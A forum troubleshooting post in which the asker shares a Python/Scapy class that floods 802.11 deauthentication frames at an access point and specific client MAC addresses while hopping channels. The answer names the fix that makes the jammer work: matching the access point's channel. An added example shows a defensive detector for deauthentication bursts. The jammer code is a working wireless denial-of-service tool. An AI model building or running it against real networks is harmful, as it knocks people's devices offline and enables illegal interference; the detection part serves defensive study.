Wifi Jammer with Scapy not working
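So I've been trying to get this Wifi Jammer working with Scapy.
I've followed this really simple tutorial, which should be enough:
https://www.youtube.com/watch?v=NKqG_i6qMJM
It didn't work, though I get the same output.
Then I found this project:
https://github.com/DanMcInerney/wifijammer/blob/master/wifijammer.py
It does some automatic scanning and channel hopping by itself to fill in some variables. If I run it, it works just fine.
So I came up with my own code, which I think should work correctly, but somehow nothing seems to happen even though all the output seems fine.
This is my AirJammer class (can't indent the code correctly here, but it's correct in my actual project):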
class AirDeauthenticator(object):

    def __init__(self):
        self.deauth_running = False
        self.running_interface = None
        self.deauth_thread = None
        self.channel_hopper_thread = None
        self.channel_lock = Lock()
        self.current_channel = 3
        self.targeted_only = False  # Flag if we only want to perform targeted deauthentication attacks
        self._burst_count = 500  # Number of sequential deauthentication packet bursts to send
        self._bssids_to_deauth = []  # MAC addresses of APs, used to send deauthentication packets to broadcast
        self._clients_to_deauth = {}  # Pairs clients to their connected AP to send targeted deauthentication attacks

    def add_bssid(self, bssid):
        self._bssids_to_deauth.append(bssid)

    def add_client(self, client, bssid):
        self._clients_to_deauth[client] = bssid

    def set_burst_count(self, count):
        self._burst_count = count

    def hop_channels(self, interface, hop_interval):
        while self.deauth_running:
            print self.current_channel
            Popen(['iw', 'dev', interface, 'set', 'channel', str(self.current_channel)], stdout=DEVNULL, stderr=PIPE)
            with self.channel_lock:
                self.current_channel += 1
                if self.current_channel > 11:
                    self.current_channel = 1
            sleep(hop_interval)

    def deauthentication_attack(self, interface):
        # Based on:
        # https://raidersec.blogspot.pt/2013/01/wireless-deauth-attack-using-aireplay.html
        packets = []
        if not self.targeted_only:
            for bssid in self._bssids_to_deauth:
                deauth_packet = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=bssid, addr3=bssid) / Dot11Deauth()
                packets.append(deauth_packet)
        for client in self._clients_to_deauth.keys():
            bssid = self._clients_to_deauth[client]
            deauth_packet1 = Dot11(addr1=bssid, addr2=client, addr3=client) / Dot11Deauth()
            deauth_packet2 = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
            packets.append(deauth_packet1)
            packets.append(deauth_packet2)
        count = self._burst_count if self._burst_count > 0 else 5
        print "N Packets: {}\n".format(len(packets))
        while count >= 0:
            for packet in packets:
                packet.show()
                send(packet, iface = interface, count = 1, inter = 0)
            count -= 1
        self.deauth_running = False
        self.running_interface = None

    def start_deauthentication_attack(self, interface, hop_interval=5):
        self.running_interface = interface
        self.deauth_thread = Thread(target=self.deauthentication_attack, args=(interface,))
        self.channel_hopper_thread = Thread(target=self.hop_channels, args=(interface, hop_interval, ))
        self.deauth_running = True
        self.deauth_thread.start()
        self.channel_hopper_thread.start()
This is my test code:
deauthor = AirDeauthenticator()
deauthor.add_bssid('00:04:CA:AC:E9:22')
deauthor.add_client('e4:71:85:30:f5:14', '00:04:CA:AC:E9:22')
deauthor.add_client('d8:5d:4c:9a:72:60', '00:04:CA:AC:E9:22')
deauthor.start_deauthentication_attack('wlan1')
The output seems fine, although I get warnings from scapy:
.WARNING: Mac address to reach destination not found. Using broadcast.
.WARNING: more Mac address to reach destination not found. Using broadcast.
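But I see the same output with the wifijammer.py tool, and that tool still works.
Is there anything else I need to be aware of when trying to send these packets?
I've tried setting the interface to monitor mode, but it still doesn't work.
OK, as far as I've been able to debug it, the problem really is in that warning message. If I unplug the USB wifi stick and plug it back in, this error does not appear the first time; if I repeat the process, it still appears.
It doesn't happen when I use the wifijammer.py tool, but I've analyzed the code over and over and couldn't find any setup mechanism that avoids this scapy problem.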
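The problem here was the wifi channel I was running on.
For this to work, the wifi channel must be set to the same one as the AP (the clients will be using the same channel as well).
Without this, the packets will be sent on another frequency that the target devices are not listening on.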
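The same channel constraint applies on the monitoring side: a sensor only hears deauthentication frames on the channel it is tuned to. The following is an added example, not part of the original post, that flags deauthentication bursts per transmitter address; the record format, thresholds, MAC addresses and sample frames are constructed assumptions.

```python
from collections import defaultdict, deque

# Constructed sample records: (timestamp_s, channel, subtype, transmitter, receiver).
# 802.11 management subtype 12 is deauthentication, 8 is beacon.
# All MAC addresses below are made-up, locally administered examples.
DEAUTH_SUBTYPE = 12
AP = "02:00:00:aa:bb:01"
STA = "02:00:00:cc:dd:02"
BROADCAST = "ff:ff:ff:ff:ff:ff"


def sample_frames():
    frames = [(0.0, 6, 8, AP, BROADCAST)]               # beacon, ignored
    frames.append((1.0, 6, DEAUTH_SUBTYPE, STA, AP))    # one ordinary disconnect
    # Burst: 40 deauth frames carrying the AP's address within two seconds
    frames += [(10.0 + i * 0.05, 6, DEAUTH_SUBTYPE, AP, BROADCAST)
               for i in range(40)]
    frames.append((30.0, 11, DEAUTH_SUBTYPE, AP, STA))  # isolated, other channel
    return frames


def detect_deauth_bursts(frames, sensor_channel, window_s=5.0, threshold=20):
    """Return {transmitter: (window_start_ts, peak_count)} for deauth floods.

    Frames on channels other than sensor_channel are dropped first, modelling
    a radio that only hears the channel it is tuned to.
    """
    recent = defaultdict(deque)   # transmitter -> timestamps inside the window
    alerts = {}
    for ts, channel, subtype, tx, _rx in sorted(frames):
        if channel != sensor_channel or subtype != DEAUTH_SUBTYPE:
            continue
        q = recent[tx]
        q.append(ts)
        while q and ts - q[0] > window_s:   # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            first, peak = alerts.get(tx, (q[0], 0))
            alerts[tx] = (first, max(peak, len(q)))
    return alerts


if __name__ == "__main__":
    for ch in (6, 1):
        print(ch, detect_deauth_bursts(sample_frames(), sensor_channel=ch))
```

With the sensor on channel 1 the same input produces no alert, so a monitor has to cover every channel its access points use. Protected Management Frames (802.11w) address the underlying weakness by letting clients reject forged deauthentication frames.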